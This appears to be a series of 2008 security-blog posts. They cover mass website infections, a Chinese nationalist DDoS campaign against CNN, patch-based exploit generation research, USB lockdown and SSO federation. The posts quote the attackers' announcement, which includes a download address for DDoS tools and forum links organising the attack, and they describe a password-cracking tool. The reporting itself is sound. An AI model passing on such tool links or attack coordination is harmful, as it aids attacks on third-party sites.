And the purpose of the attack? Feeding the 1.js file into our automation system, we see a whole mass of pages that will get loaded as a result of browsing a compromised page. This is represented in the flowchart below (click to enlarge):
yellow blob: malicious 1.js file loaded from compromised pages
green arrows: page loads via an iframe (or similar)
red arrows: exploit payload, in this case resulting in the download of some Win32 malware

Read their full analysis.

Update (23/04/2008): I got a response from the FCCU and the BELNET CERT has taken over the case. Their priority is of course to their constituency (BELNET). But as only CERT in Belgium, they try to be a "last resort" point of contact as long as their resources will allow it. That's very nice to hear!!! I might have a meeting with them in the future to exchange some ideas.

In the meantime, the number of infected sites displayed has mounted up to 273.000 and the infected belgian sites up to 93.

Related articles:

at 22.4.08

During an attack on CNN, the Sports Network got defaced because the Chinese hackers thought they were a part of CNN. But they were only a source for CNN.

So how did TSN recover from the attack? The Zdnet blog Zeroday has some information on it.

The company’s sports information and wire service was the priority when SportsNetwork brought its operations back up. Within a few hours, SportsNetwork, which primarily competes with Stats Inc., was serving its feeds to thousands of customers, which range from portals to most newspapers in the U.S. The data feeds (example right) represent the bulk of SportsNetwork’s revenue. The company’s site serves more as marketing showcase.

The lesson: Recover the revenue generating tools first. Sports Network, based in Hatboro, PA, has about 130 employees, a CTO and about 18 developers working on the site.
Will Sports Network change its security policies? Charles said on the security front his company had “all the things that everyone has” and noted that it’s obvious that his firm will have to do more. The challenge is that any change the company makes will have to be echoed by more than 1,000 customers.

Sports Network may speed up plans to add another layer of security, but is leaving the planning to his CTO. Whatever Sports Network does it’ll have to do so quickly. “The irony is we’re sending a gang of people to Beijing for the Olympics,” says Charles.

Read the full article.

Do you have an incident response plan? Did you test it? Do you have good backups?

Related topics:

at 22.4.08

Security policy considerations for virtual worlds
US political elections and cybercrime
Using packet analysis for network troubleshooting
The effectiveness of industry certifications
Is your data safe? Secure your web apps
RSA Conference 2008 / Black Hat 2008 Europe
Windows log forensics: did you cover your tracks?
Traditional vs. non-tranditional database auditing
Payment card data: know your defense options
Security risks for mobile computing on public WLANs: hotspot registration
Network event analysis with Net/FSE
Producing secure software with security enhanced software development processes
AND MORE!

Download issue here.

Related articles:

at 22.4.08

On my home systems, I try to keep up to date as much as possible and even scan with PSI monthly to see which 3rd party patches I'm missing. But for Java it doesn't seem easy to follow up on patches.

Sun Microsystems issued another update to fix security and stability problems with its Java software, but few users are likely to have noticed, as Sun currently isn't doing anything to alert people.

The latest update to version of Java most Microsoft Windows users have on their machines -- Java Runtime Environment (JRE, also called simply "Java Update" in the Windows Add/Remove programs list) -- is JRE 6 Update 6. However, both of the methods I normally use to tell whether I'm running the latest, patched version failed to tell me that there was a new version of Java available. Update 6 plugs at least one security vulnerability, along with at least a dozen other bugs.

Users who want to install this latest update now can grab it from this link here (the JRE is the 5th item listed). As always, remember to uninstall any older versions of Java you may have, either before or after updating, as Sun's Java installers still do not take care of this basic process for the user.
I've found that the Java updater that ships with the software typically takes anywhere from two to four weeks after an update has been shipped to alert me that it is available. Sun's Java homepage is usually a bit faster on the uptake, but it also still tells me that I'm running the most current version with my install of Java 6 Update 5. (Source: Washingtonpost.com)

So why doesn't keep Sun people more up to date? If you go the regular download site, you can still see that they recommend version 6 update 5. It was also a small shock to read that their updater only notifies you in two to four weeks. So upgrade your system to version 6 update 6 and deinstall the previous versions to remain secure.

Especially in light of my previous post, this is a little bit to worry about.

Previous posts:

at 22.4.08

John Bambenek from SANS Internet Storm Center has an interesting post about the patch time window.

For some time, many researchers have been pointing to the fact that the "patch window" (the time between a patch being released and an exploit being developed) has been decreasing. A few years ago, the ISC's Johannes Ullrich did a presentation on this subject which showed the patch window decreasing to a few days. Today, another Handler, Mari Nichols, pointed me to this research from a joint project between Berkeley, University of Pittsburgh and Carnegie Mellon.

For some time, it has been known that the patch can be reverse-engineer to help attackers write an exploit for a vulnerability that might not be fully detailed in public accounts (for good reason). The bad guys have gotten pretty good at this where they can turn around an exploit in a day or so after a patch is released. What is interesting about this research is that they developed means partly using off-the-shelf tools to make this process automatic.

In some of the cases they tried, they claimed to be able to create an exploit in minutes after receiving the patch and comparing the patched version of the application with the unpatched version. To be fair, their process seemed "dirty" such that more often than not the exploit created crashes or DoS type exploits and several attempts were needed to get something closer to viable. The process often took minutes so when/if the method is improved it could be trivial to create something that grabbed patches ASAP, turn an exploit in minutes and start infected vulnerable machines before 3am during the monthly patch dump with automated patching.

A solution suggested by the authors is "secure distribution of patches". To me, this is meaningless. You need to get patches out to people with a minimum amount of effort. This is why automated patching was such a good thing. But even if you encrypt, require passwords and logins, etc... you are going to delay the time for legitimate people to patch, and attackers (who are perfectly able to buy Windows legit) will grab the patches quickly anyway. You'd only make the window of vulnerability longer by making things secure without a tangible benefit.

Solution: Not much, we've known the window was closing for awhile. Responding quickly and proactively to threats is still a must and the use of temporary workarounds will probably raise in value. (Source ISC SANS)

Download the paper here: Automatic Patch-Based Exploit Generation is Possible: Techniques and Implications (www.cs.cmu.edu).

Abstract:

The automatic patch-based exploit generation problem is: given a program P and a patched version of the program P′, automatically generate an exploit for the potentially unknown vulnerability present in P but fixed in P′.
In this paper, we propose techniques for automatic patch-based exploit generation, and show that our techniques can automatically generate exploits for 5 Microsoft programs based upon patches provided via Windows Update. Although our techniques may not work in all cases, a fundamental tenet of security is to conservatively estimate the capabilities of attackers. Thus,
our results indicate that automatic patch-based exploit generation should be considered practical. One important security implication of our results is that current patch distribution schemes which stagger patch distribution over long time periods, such as Windows Update,
may allow attackers who receive the patch first to compromise the significant fraction of vulnerable hosts who have not yet received the patch.

So how fast do YOU patch?

at 21.4.08

With all the high storage devices like the iPod classic going up to 160GB and just fitting in your inside pocket, people are getting more scared of data loss. Even Dave Lewis from Liquidmatrix recently saw someone at a client site using an iPod to pull corporate data onto it as a hard drive.

On Liquidmatrix, he mentions an easy trick to disable this without deactivating USB entirely. It just disables USB storage devices.

Run regedit ans search for the key: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\USBSTOR

The key value for “Start” is set to “3″. This permits USB storage to be attached to the system in question. If this is flipped to “4″ storage devices will be disabled. Whatever you do, make a backup before attempting any registry work.

Thanks Dave!

Some endpoint security software packages gives you the possibility for employees to use USB pendrives and the like but the data won't be usable on a non-corporate PC. It also allows more granular control over connectivity in endpoint devices. But it doesn't always has to be that complicated (or expensive).

McAfee Avertlabs had also an interesting piece: Data in your pocket.

As devices grow smaller and other devices not really seen as “traditional computers” like mobiles and others storage capable devices become more popular, the physical security of such devices become important again. Mobile phones these days can easily store 2-8 GBs of data or more. This could include business critical emails, identity, credit card information or family pictures. As these devices are small, they can easily be lost, stolen and pilfered. Most of these devices run sophisticated enough operating systems, often with wireless capabilities and Bluetooth as well, making other application and network issues applicable to them as well. Not only such handheld devices, even traditional equipments are more vulnerable to physical security these days as most of the concentration is on securing the systems from network or application attacks.

Data that can roam with us in our pockets is less physically secure, but good user education and software can at least keep it from getting misused, if not able to prevent it from getting lost.

Related articles:

at 21.4.08

Let's give you the latest updates on the attacks on CNN.com following my previous post. Now we know what they meant with "this has already obstructed the motherland’s normal network communications". The attack did slow down CNN.com but it never stopped working. It did seem to slow down the site from the China mainland.

The latest post on Arbornetworks gives us some interesting details:

Even after the attacks were called off, we saw evidence of some DDoS attacks, and CNN has confirmed it. Maybe not everyone got the message, or maybe someone just felt like grinding an axe. The attacks didn’t seem to disrupt their service much, and the network operators around CNN seemed to handle the attacks quite well. Most of the attacks were TCP SYN floods (still popular after all these years), targeting three different CNN websites. Attack intensity was pretty small on average, with the peak attack intensity still a modest (by global attack standards) 100 Mbps. Here’s a breakdown of the attacks as we saw them over the weekend.

Attack bandwidth peak: 100 Mbps, average: 20 Mbps

Attack duration peak: 30 minutes, average: under 15 minutes

Attack targets www2.cnn.com, www3.cnn.com, edition.cnn.com

But TheDarkVisitor referred us to Danwei.org telling us that the Website of The Sports Network (TSN) got defaced. As of this writing, there is still a 'sorry page' displayed. A screenshot of the defaced website is displayed at the beginning of this post. The chinese hackers were celebrating their victory with this screenshot.

The Sports Network (commonly known as TSN) is a Canadian English language cable television specialty channel and is Canada's leading English language sports television channel. I don't see a direct connection between the two besides that sports.si.cnn.com resolves to the same IP as www.sportsnetwork.com but it's hosted on another network then CNN. So the chinese hackers thought they were hacking CNN.com.

Update: Changed the text above. It was not a part of CNN that went down but an innocent bystander. And it seems that CNN did went down for a very small time. At least according to Netcraft:

The CNN News website has twice been affected since an earlier distributed denial of service attack last Thursday. CNN fixed Thursday's attack by limiting the number of users who could access the site from specific geographical areas.

Subsequently, an attack was purportedly organised to start on Saturday 19th April, but cancelled. However, our performance monitoring graph shows CNN's website suffered downtime within a 3 hour period on Sunday morning, followed by other anomalous activity on Monday morning, where response times were greatly inflated.

Related articles:

at 20.4.08

This is a not security related post unless you consider this the "A" from the CIA Triad (no, not CIA the agency). How to be more available to the people and tasks that most need it? How can you be more efficient in your life or at work? How to tackle that overcramped inbox and all those interruptions? To help you learn how to "hack life", I'm presenting two website: Lifehacker.com and 43folders.com. Here are some of the useful articles, you will find there.

Inbox Zero (43folders series)
Become an email ninja (43folders series)
Ask the Readers: How to stop workday interruptions? (Lifehacker.com)
How I made my presentations a little better (43 folders)
Building a Smarter To-Do List, Part I (43 folders)
Free Ways to Synchronize Folders Between Computers (Lifehacker.com)
Top 10 DIY Laptop Stands (Lifehacker.com)
The Best of Lifehacker in Upgrade Your Life (Lifehacker.com)
Your Most Essential Firefox Keyboard Shortcut? (Lifehacker.com)
Give an Old Laptop New Life with Cheap (or Free) Projects (Lifehacker.com)
Top 10 Smart and Lazy Ways to Save Your Workday (Lifehacker.com)
and much much more (check out those website or subscribe to their rss feed)

Gina Trapani, editor from Lifehacker has also 2 books: Upgrade Your Life: The Lifehacker Guide to Working Smarter, Faster, Better and Lifehacker: 88 Tech Tricks to Turbocharge Your Day.

So, learn to hack life for more fun and productivity.

By the way, the slides from the presentation "Inbox Zero" is one of my favorite presentations.

| View | Upload your own

at 20.4.08

The Honeyblog has posted their paper on the "Measurements and Mitigation of Peer-to-Peer-based Botnets: A Case Study on StormWorm"

Abstract:

Botnets, i.e., networks of compromised machines under a common control infrastructure, are commonly controlled by an attacker with the help of a central server: all compromised machines connect to the central server and wait for commands.
However, the first botnets that use peer-to-peer (P2P) networks for remote control of the compromised machines appeared in the wild recently. In this paper, we introduce a methodology to analyze and mitigate P2P botnets. In a case study, we examine in detail the Storm Worm botnet, the most wide-spread P2P botnet currently propagating in the wild. We were able to infiltrate and analyze in-depth the botnet, which allows us to estimate the total number of compromised machines.
Furthermore, we present two different ways to disrupt the communication channel between controller and compromised machines in order to mitigate the botnet and evaluate the effectiveness of these mechanisms.

If you ever wanted to know some of the more technical details about Storm Worm. Download here.

Related articles:

at 20.4.08

Our story started April the 16th when The Dark Visitor Blog warned us about a plan to DDoS CNN.com (see picture above):

Several Chinese hacker groups are calling for a DDOS attack on the CNN website to begin at 8:00pm on 19 April 2008. While only three websites have openly posted about this attack, my guess is that many more calls are going on behind closed doors. (Source: The Dark Visitor)

In the days that followed, the call got more attention and started to spread:

Second, many more Chinese sites, not just hacker, starting to call for the DDOS attack on CNN. Also they are starting to solidify their plans. Here are the details from one posting on the Guilin University of Electronic Technology bulletin board:

Attack will start on 19 April 2008, at 8:00 pm
DDOS attack on www.cnn.com
The DDOS attack is going to last over three hours
They need a large number of compromised computers to carry out the attack and are requesting everyone’s support in putting to together the number needed

The plan has many more details but unfortunately the language is too technical for me to translate.

Here are additional sites calling for the attack on CNN.

http://bbs.neteasy.cn/showthread.php?p=984976
http://www.coogo.net/bbs/showtopic-444648.aspx
http://www.ytjt.com.cn/bbs/redirect.php?tid=36644&goto=lastpost
http://www.ipark.cn/bbs/Post.asp?PostID=836336
http://blog.xuite.net/lemon_head/simple/16728332
http://tieba.baidu.com/f?kz=357748876
(source: The Dark Visitor)

This was getting some press coverage. So, about a day before the planned attack the organizers identified as "Revenge of the Flame" tried to call off the attack to reschedule it in the near future:

The Chinese hacker group that has been organizing to attack CNN has been identified as the “Revenge of the Flame.” They recently released a statement calling off the DDoS attack on CNN; however, it may have come too late to stop some of its members from going after the site. (Source: The Dark Visitor)

And some guys could not wait till the 19th and went a ahead with an attack. The guys from Arbornetworks did an analysis.

Destinations
www.cnn.com (one of the IPs for this DNS name)

Attacks in past 24 hours
36 attacks measured

Attacks by type
36 TCP SYN floods

Average and max attack duration
330 seconds average (5.5 minutes), 337 second maximum (slightly longer)

These attacks were very small, they barely registered, so it’s hard to say that they’re the massive onslaught that we may see this weekend. It’s possible this is entirely unrelated - a lot of hackers try to bring down major websites like this every day. (Source: Arbornetworks)

CNN itself reported on the attack which at that point didn't cause major harm on the website.

CNN was targeted Thursday by attempts to interrupt its news Web site, resulting in countermeasures that caused the service to be slow or unavailable to some users in limited areas of Asia.
"CNN took preventative measures to filter traffic in response to attempts to disrupt our Web site. A small percentage of CNN.com users in Asia are impacted," the network said in a statement.
"We do not know who is responsible, nor can we confirm where it came from," the statement continued.
A CNN spokesman said the Web site began to notice problems around midday Thursday and took measures to isolate the trouble by limiting the number of users who could access it from specific geographic areas.
As a result, he said, some users in those areas experienced temporary slowdowns or problems accessing the site.
The spokesman could not offer an estimate of how many users were affected. However, he said that the impact on daily usage was "imperceptible" and that the site "at no time" went down.
Service had returned to normal by mid-morning Friday, he said. (Source: CNN.com)

So was this just a hot air balloon? Maybe not, another update on The Dark Visitor showed us that the leader of the Revenge of Flame "cn_Magistrate" posted attack tools to assist in the attack.

As always, my thanks for everyone’s strong sense of nationalistic responsibility; once again, the Magistrage is grateful to everyone.

Today is 18 April, we are angry and we shall roar, the annoucement follows:

Prior to 8:00 pm on 18 April 2008, we invite everyone on IS (ID number 12570496). We will have an important matter to pass along. (This part a little rough on xlation) Please note our compatriots will find a way online, obey directions that have been put in place.
Tool download address, considering that there are many normal web users who do not have a high-degree of technical knowledge, we are providing idiot-type (really means for those who don’t know) tools for download. The download address: http://playgood.ys168.com/. Everyone please pay attention to the group announcements.
Everyone please remain disciplined, listen to the directions of each of the group managers. Pay attention to your own words, deeds and essence. We are all Chinese! (source: The Dark Visitor)

The latest update from Arbornetworks at 8PM US Eastern Time indicated that the attack were ramping up:

More attacks to report, with greater intensity. It look s like some people still giving this a go. I cannot, with the data I have, attribute this to any of the Chinese attacker groups that are supposedly behind the rally call, so this could be other parties entirely. (Source: Arbornetworks)

So this was the latest update and CNN.com seems to be alive and kicking. Was the attack successful ? What was the overall impact? I'll update this post in the next hours as I find new updates.

Update from Thedarkvisitor: Revenge of the Flame disbands, denies all responsibility for attack on CNN…and kills website

Currently, everyone on the internet is using the instrument of attack as a means to express their passion and this has already obstructed the motherland’s normal network communications. This is something we do not wish to see happen. Regardless if it is “Revenge of the Flame” or not, we hope that everyone can rationally reflect on this question.

From this moment, the Revenge of the Flame is disbanded!! If there are any notification after this, they will be posted here. We respectfully ask that you pay attention to this page.

Read full post here.

CNN still seems to be live. I'm just wondering what they meant with "this has already obstructed the motherland’s normal network communications".

Here is the update: Update on CNN.com attacks, not down but defaced

at 18.4.08

It's not a joke. It's a real book. John Wiley & Sons publishes the first "Vulnerability Management For Dummies" in cooperation with Qualys.

Vulnerability management is defined as the systematic finding and elimination of weakspots or security flaws in an IT network.

"Vulnerability Management For Dummies" simply explains the essential steps of vulnerability management and shows you how to select the right tools. In five succinct parts it leads the reader through an essential understanding of the need for vulnerability management and provides a guide to the essential best practice steps, the various options availability, the pros and cons of automated vulnerability management and finally provides a valuable ten-point checklist for removing vulnerabilities in the network.

"According to Gartner and industry luminaries, Vulnerability Management is the cornerstone of security and compliance best practices. It is an application that requires management, security and audit teams to collaborate with the production team to effectively identify and remediate security and compliance issues in a timely manner," said Philippe Courtot, CEO and chairman of Qualys. "Our goal in publishing this book in collaboration with our customers, which we are very thankful for, is to provide real-world examples on how do vulnerability management in order to address the security and compliance issues facing all of us."

An electronic version of the book will also be available to download next Tuesday 22 April, please visit http://www.qualys.com/dummies

at 18.4.08

Nitesh says it very beautifully : "Be Secure, and You'll be Compliant"

First, no company should ever strategize their overall security efforts based on a 3rd party requirement. A company's strategy should be based on its specific business goals that should be used to drive the security strategy. Tony Spinelli, CSO of Equifax, has articulated this point very well. He says: Most companies and [their] security leaders are getting lost because of [having to be] compliant -- regulations saying you have to do X or Y.... A lot of people are letting compliance drive security, and that's as wrong as you can get....You have to become secure to be compliant; otherwise, you respond and react and reinvest without leverage.

Second, it is not true that security code reviews are overwhelmingly more expensive than black box reviews. The entire purpose of a security code review is to combine it with a solid security SDLC process, with the aim to push left, and the goal to find and remediate security vulnerabilities earlier on in the development cycle - the overall costs of which is likely to be lower than the cost of relying upon black-box penetration assessments. Run, don't walk, from any vendor that tells you to base your application security strategy on black-box penetration assessments because anything else is too expensive - you'll end up paying through your nose while failing to fix the root cause of what's ailing your development efforts.

Third, web application firewalls can be useful, yet the most terrible band-aids when applied for the wrong reasons. Just because a 3rd party standard may require it doesn't mean it's the only thing you need to do.

In summary, please do not let a requirement like PCI drive your overall strategy. Understand your goals and needs, aim to be secure, and you will be compliant. Try the formula the other way around, and your strategy will be flawed, your security budget won't be big enough, you will struggle to keep up with requirements & regulations, and you will fail to demonstrate risk reduction to your organization.

He's my man of the day. Being compliant doesn't mean secure. The Hannaford case was a very good example!!! It sounds so simple, be more secure to be compliant.

Related articles:

at 18.4.08

Sebastian from Owasp Belgium notified me about the upcoming OWASP AppSec Europe 2008 - Belgium.

Welcome to the European OWASP Application Security Conference! After successful OWASP Conferences in the United States and Europe, we are back in Belgium: 5 tutorials and 2 conference tracks in the historic center of Ghent on May 19-22 2008!
The conference is stuffed with top notch presentations from industry recognised speakers and technical experts on the latest application security risks and trends. New for AppSec Europe: technical vendor demos and a Capture the Flag!
Conference (May 21-22)
The Great Information Security Scrap Yard Challenge (Mark Curphey)
Software Security: State of the Practice 2008 (Gary McGraw)
The OWASP ESAPI project - Dave Wichers
Trends in Web Hacking Incidents: What's hot for 2008 - Ofer Shezaf
Evaluation Criteria for Web Application Firewalls - Ivan Ristic
HTML5 security - Thomas Roessler
The OWASP Orizon Project internals - Paolo Perego
Remo presentation (Input Validation) - Christian Folini
Best Practices Guide: Web Application Firewalls- Alexander Meisel
Google-Hacking and Google-Shielding - Amichai Shulman
NTLM Relay Attacks - Eric Rachner
The Law of Conservation of Bugs - Gunnar Peterson
Security in Agile Development - Dave Wichers
Security framework is not in the code - Sam Reghenzi
Exploiting Online Games - Gary McGraw
SHIELDS- Eva Coscia
Graph Analysis for WebApps: From Nodes to Edges - Simon Roses Femerling
The OWASP Education Project - Martin Knobloch
Dynamic Taint Propagation: Finding Vulnerabilities Without Attacking - Brian Chess
Threat Modeling for Application Designers & Architects - Shay Zalalichin
Scanstud: Evaluating static analysis tools - Martin Johns,
Office 2.0: Software as a Service, Security on the Sidelines? - John Heasman
How Data Privacy affects Applications and Databases - Dirk De Maeyer
The OWASP Anti-Samy project - Jason Li
Input validation: the Good, the Bad and the Ugly - Johan Peeters
Refereed paper track keynote - Dieter Gollmann

Tutorials (May 19-20):
Building and Testing Secure Web Applications
Leading the Development of Secure Applications
Building Secure Rich Internet Applications
Web Services and XML Security
Open Source ModSecurity Training

Registration is available via the OWASP Conference Cvent site at: Cvent link

The conference fee for this conference is :

Standard: 350 Euros, OWASP Members: 300 Euros, Students: 225 Euros.
Conference Dinner (Evening of May 21st): 50 Euros
Conference Tutorials: 825 Euros, Student Fee: 430 Euros
CONFidence Poland 2008 members get a € 35 reduction on OWASP (see OWASP On a Plane below).
ISSA, ISACA and L-SEC Members get a € 35 reduction.

http://www.owasp.org/index.php/AppSecEU08

at 17.4.08

Our friends at the Internet Storm Center, have solved the mystery of the mass website infection in January pointing to the uc8010.com domain. Computer Associates was one of the victims. It's been confirmed that SQL injection was the vector of attack. Injection attacks are listed as nr. 2 in their OWASP Top Ten Application vulnerabilities.

Yesterday, one of our old friends, Dr. Neal Krawetz, pointed us to another site hosting malicious JavaScript files with various exploits. While those exploits where more or less standard, we managed to uncover a rare gem between them – the actual executable that is used by the bad guys in order to compromise web sites.

While we had a general idea about what they do during these attacks, and we knew that they were automated, we did not know exactly how the attacks worked, or what tools the attackers used. The strategy was relatively simple: they used search engines in order to find potentially vulnerable applications and then tried to exploit them. The exploit just consisted of an SQL statement that tried to inject a script tag into every HTML page on the web site.
The utility we recovered does the same thing. The interface appears to be is in Chinese so it is a bit difficult to navigate around the utility, but we did some initial analysis of the code (which is very big) to confirm what it does.

Full analysis at the ISC.

Related articles:

at 17.4.08

I'm pursuing a Master in ICT Audit & Security and last Tuesday we had a class on Access Control Systems and Methodology (as part of the Common Body of Knowledge for CISSP). So we saw the triple AAA, Kerberos, SSO etc.... not much new stuff for me but I did take some notes during the class of related information that was not discussed.

When talking about biometrics (as (secure?) authentication *cough*), I remembered the case of the German minister and his copied fingerprints.

Still, biometrics seems to be very hot (technewsworld.com) as seen on the latest RSA show. Just be careful that it's been well tested. Look for someone with a security mindset (schneier.com) to test it.

When the teacher was discussing hashes and encrypted passwords, he mentioned bruteforcing passwords but I didn't hear him mentioning Rainbowtables.

And when talking about decoding password (hashes), have a look at this nice tool:

Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of various kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols. The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort. It covers some security aspects/weakness present in protocol's standards, authentication methods and caching mechanisms; its main purpose is the simplified recovery of passwords and credentials from various sources, however it also ships some "non standard" utilities for Microsoft Windows users.

There was one new topic for me covered in the class: federation. Unfortunately, he had to skip this part since he was out of time. So let's have a look.

Example of SSO Federation

Large enterprise with several separate business units

It is quite common to have several separate business units in large enterprise each running their own single sign on systems. It is quite easy, using a product link Ping, to quickly accept levels of trust for authentication from one business unit and pass the user on to applications and/or information managed by another business unit without requiring re-authentication and/or the need for additional ids and passwords. This achieves single or reduced sign on for the user while reducing enterprise user management costs. This requires little additional hardware and software and can be done quite quickly.

Between your enterprise and business partners or customers

Often times your enterprise will have many customers or business partners who are accessing one or many of your internal applications. Depending on the degree of trust you have with these other enterprises, you can use federated authentication with them.

For example, Susan, a business partner's employee will logon to the business partner's systems. When she clicks on a link to an application in your enterprise, the business partner's single sign on system creates a security assertion and passes this to your enterprise. Your enterprise's single sign on system then takes the assertion, reviews it, and if accepted grants Susan access to the application without requiring her to logon.

This reduces your overall user management costs by not having to grant Susan with a id and password. It makes Susan's work life easier by not having to remember another id and password.

Further, the single sign on system can be used to require stronger authentication. For example, Susan may be granted access to low risk applications. However, when she clicks on a high risk application, the SSO system may require her to re-authenticate using a stronger authentication mechanism such as a digital certificate, security token, smart card, biometric or combinations thereof.

Between your enterprise and outsourced providers

It is quite common for enterprises today to have outsourced portions of their internal processes. Examples include inventory management, benefits, 401k management, training etc.

When your employee clicks on a link to one of these functions, say their benefits plan, your enterprise SSO system prepares a security assertion and sends this to your benefits supplier. Their internal SSO system reviews the assertion and if accepted grants your employee immediate access to their information without having to login in using a id and password issued from the benefits supplier.

This provides your employees with ease of use. It also reduces the benefits supplier's management costs in issuing ids and passwords.

Ping Identity federation is an excellent product to use to quickly build federated authentication trust between disparate SSO and identity systems. Other identity product vendors also have identity federation products in their product suites.

A more detailed discussion about federation protocls can be in Authentication Federation. (Source: Authenticationworld.com)

at 16.4.08

Phrack Issue 65 is out. Get the tar.gz here.

From the Introduction:

This is the 65th edition of Phrack and we are still alive.

Despite that some people say they don't learn anything when reading phrack we
still think that Phrack is one of the best underground communication methods.
Ohwell, for sure, there are other and even better ways. But Phrack is one wayand
probably not the worse. We have tried to release this issue earlier butediting a
magazine (and especially Phrack) is not easy. We have received alot of positive
comments after Phrack release #64 and a lot of people saidthey will contribute.
However we did not see anything coming. Almost allarticles from this release are
coming from our first circle of friends.Again.
This release, despite that it is not the perfect one, tries to bringa good mix between technical articles and what we call spirit articles. Ourintroducing and concluding articles (Phrack
Prophile and The UndergroundMyth) bring two opposite visions of the hacking underground.
Contradiction? No. Freedom of speech.
We have kept with our regular columns Phrack World News and International Scenes. We also have decided to publish less exploit articles. However, low-level hackers should find their way easily into this new release.

Previous articles:

Phrack #64 : Reborn

at 16.4.08

On security.nl, I discovered a very interesting research paper on High Tech Crimes and the link with Organized Crime. The WODC (the Dutch abbreviation for Wetenschappelijk Onderzoek- en Documentatiecentrum, in English: Research and Documentation Centre) can best be characterised as an international criminal justice knowledge centre. "Excellence" and "customer-orientation" are the organisation's guiding principles. Its major output is knowledge for the benefit of policy development.

Description of the report

The lack of knowledge concerning the perpetrators of high-tech
crime and the involvement of organised crime is an important gap in terms of
developing an efficient and effective policy. As such, the Ministry of Justice
felt that it was fitting to commission a literature inventory, mapping the
status quo and existing knowledge in relation to high-tech crime.

The summary document in english. (0.20 mb)

The full report in Dutch (1.44 mb 224 pages)

Some highlights of the report:

Young people with good IT skills are being drafted on universities, computerclubs and the internet to support criminals (especially by groups from Russia and Eastern Europe)
The numbers of IT related crime is rapidly increasing
Selling or renting botnets has become a lucrative business (in which The Netherlands plays a big part)
Criminal organizations already have quite some IT skill "in house"

Interesting stuff. I checked if Google Translate could process the document but it wouldn't work like that. I know that software cannot perfectly translate but if someone knows another engine that will, let me know. I don't feel like translating 200 pages.

at 15.4.08

From heise.co.uk:

The Wi-Fi Positioning System (WPS) used by Apple's iPhone and iPod Touch and other mobile devices can easily be supplied with false information that makes the mobile think it's somewhere other than its true location. Researchers at the Swiss Federal Institute of Technology Zürich have found that all you need is a laptop, a Wi-Fi access point transmitter and a database of Wi-Fi access point locations.

The MAC address of an active Wi-Fi access point is continuously announced. WPS works by the client detecting the MAC addresses of nearby access points and comparing the cluster of found addresses with a database of clusters referred to geographical locations. The iPhone and iPod Touch apparently make use of the Skyhook Wireless Inc database of Wi-Fi access point locations, as do Nokia Symbian-based phones and PCs equipped with Skyhook's Loki plugin.

Having a GPS-like navigation on the iPhone or iPod Touch using open access points? I always suspected that MAC addresses were used and this confirms it. Compared to cellular tower positioning, there is no authentication and spoofing becomes very easy.

It also reminds me of the Italians who spoofed the RDS TMC signal for GPS systems.

Since we are talking about the iPhone/iPod Touch, here is a way to hack your iPod Touch into a VOIP Phone.

Related articles:

at 15.4.08

Userfriendly.org is one of my favorite cartoons. The writer Illiad wants to demonstrate of how websites are used to infect PCs today. LOL

Related articles:

at 15.4.08

Date: Thursday, April 17, 2008 at (17:00 GMT)

Presented by: Jonathan A. Zdziarski

This is a free live event. Scheduled for approximately 45 minutes.

With the iPhone quickly becoming the market leader in mobile devices, the need for law enforcement personnel to perform forensic analysis of these devices is beginning to surface. Unlike most other smart phones, the iPhone incorporates desktop-like features in an easy-to-use mobile package. As a result of its high level of technology and available features, many are likely to use it as a primary device for various forms of data and communication. While some of a suspect's data can be viewed using the direct GUI interfaces in the iPhone's software, much hidden and deleted data is available as well, which may provide for more thorough evidence gathering.
Existing commercial forensic tools are sadly lacking their ability to perform deep raw disk level recovery, and so Jonathan will demonstrate how to install his custom forensics toolkit on any existing model iPhone and send a raw disk image to a desktop machine. He will also show you how to recover files specific to the iPhone including deleted keyboard caches, photos, web objects, and much more.
Jonathan's custom forensics toolkit and his accompanying forensic manual will be available free to forensic investigators in law enforcement.

More (O'Reilly)

Related articles:

at 15.4.08

From sbin.cn:

CNCERT released their annual report on the overall security status at China for 2007. You can download this report at their website. This report is in Chinese.
At this report, some numbers and trends are highlighted.
Compared against those numbers at 2006, security incidents and botnet(zombie) hosts at China increased rapidly, or even upsoared.
website phishing - 1.4 times
malicious code at web pages - 2.6 times
defaced websites - 1.5 times
Trojaned hosts - 22 times….
where the Trojaned hosts are estimated to up to one million (995,154) IPs compared against 44717 IPs at 2006.

Hmm. Does not look too good. I'm sure that the English version will also be released. You can find the previous reports in English here.

at 15.4.08

Saint vulnerability scanner updated to v6.7.7 and OpenSSH 5.0 were released. You might think, how can OpenSSH be a pentesting tool? Remember the SANS papers from yesterday? (Espionage - Utilizing Web 2.0, SSH Tunneling and a Trusted Insider)

OpenSSH is a FREE version of the SSH connectivity tools that technical users of the Internet rely on. Users of telnet, rlogin, and ftp may not realize that their password is transmitted across the Internet unencrypted, but it is. OpenSSH encrypts all traffic (including passwords) to effectively eliminate eavesdropping, connection hijacking, and other attacks. Additionally, OpenSSH provides secure tunneling capabilities and several authentication methods, and supports all SSH protocol version

Full OpenSSH 5.0 changelog

SAINT is the Security Administrator’s Integrated Network Tool. It is used to non-intrusively detect security vulnerabilities on any remote target, including servers, workstations, networking devices, and other types of nodes. It will also gather information such as operating system types and open ports. The SAINT graphical user interface provides access to SAINT’s data management, scan configuration, scan scheduling, and data analysis capabilities through a web browser. Different aspects of the scan results are presented in hyperlinked HTML pages, and reports on complete scan results can be generated and saved
New feature in 6.7.7::

Configuration options to customize password policy checks:

Password length - the required number of characters in the password
Password history - number of previous passwords which cannot be re-used
Maximum Age - days after which the user must change the password
Minimum Age - days before which the user cannot change the password
Lockout - the number of failed logins before the account is locked out
New vulnerability checks in version 6.7.7:

cumulative Internet Explorer vulnerability (MS08-024)
GDI remote code execution vulnerability (MS08-021)
CUPS
Firefox, Thunderbird and SeaMonkey
Novell eDirectory LDAP DelRequest Message Handling Buffer Overflow
Asterisk vulnerabilities
Ruby
Acrobat Reader Linux vulnerability
OpenSSH
Java Web Start vulnerabilities
Internet Explorer vulnerabilities involving setRequestHeader
additional Aurigma vulnerabilities
ASUS Remote Console DPC Proxy Service Buffer Overflow
solidDB vulnerabilities
McAfee ePolicy Orchestrator Framework Services HTTP Buffer Overflow
Cisco IOS vulnerabilities
HP OpenView Network Node Manager HTTP Handling Buffer Overflow
OpenVMS ssh
QuickTime vulnerabilities
